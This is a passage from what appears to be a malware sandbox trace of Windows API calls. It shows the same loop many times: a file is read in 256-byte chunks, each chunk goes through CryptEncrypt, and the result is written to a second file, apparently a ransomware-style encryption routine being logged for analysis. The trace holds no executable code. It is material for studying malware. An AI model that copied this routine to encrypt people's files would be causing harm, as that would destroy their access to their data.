lpOverlapped=0x0) returned 1 [0152.605] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.605] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.605] GetLastError () returned 0x0 [0152.605] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.605] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.605] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.605] GetLastError () returned 0x0 [0152.605] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.605] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.605] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.605] GetLastError () returned 0x0 [0152.605] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.605] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.605] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.605] GetLastError () returned 0x0 [0152.605] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.605] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.605] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.605] GetLastError () returned 0x0 [0152.605] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.606] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.606] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.606] GetLastError () returned 0x0 [0152.606] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.606] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.606] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.606] GetLastError () returned 0x0 [0152.606] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.606] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.606] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.606] GetLastError () returned 0x0 [0152.606] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.606] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.606] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.606] GetLastError () returned 0x0 [0152.606] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.606] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.606] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.606] GetLastError () returned 0x0 [0152.606] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.606] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.606] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.606] GetLastError () returned 0x0 [0152.606] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.606] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.607] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.607] GetLastError () returned 0x0 [0152.607] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.607] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.607] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.607] GetLastError () returned 0x0 [0152.607] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.607] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.607] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.607] GetLastError () returned 0x0 [0152.607] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.607] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.607] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.607] GetLastError () returned 0x0 [0152.607] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.607] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.607] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.607] GetLastError () returned 0x0 [0152.607] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.607] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.607] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.607] GetLastError () returned 0x0 [0152.607] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.607] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.607] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.607] GetLastError () returned 0x0 [0152.607] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.608] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.608] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.608] GetLastError () returned 0x0 [0152.608] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.608] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.608] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.608] GetLastError () returned 0x0 [0152.608] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.608] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.608] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.608] GetLastError () returned 0x0 [0152.608] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.608] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.608] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.608] GetLastError () returned 0x0 [0152.608] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.608] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.608] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.608] GetLastError () returned 0x0 [0152.608] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.608] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.608] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.608] GetLastError () returned 0x0 [0152.608] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.608] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.609] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.609] GetLastError () returned 0x0 [0152.609] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.609] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.609] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.609] GetLastError () returned 0x0 [0152.609] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.609] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.609] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.609] GetLastError () returned 0x0 [0152.609] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.609] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.609] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.609] GetLastError () returned 0x0 [0152.609] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.609] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.609] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.609] GetLastError () returned 0x0 [0152.609] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.609] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.609] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.609] GetLastError () returned 0x0 [0152.609] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.609] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.609] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.609] GetLastError () returned 0x0 [0152.609] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.610] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.610] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.610] GetLastError () returned 0x0 [0152.610] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.610] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, 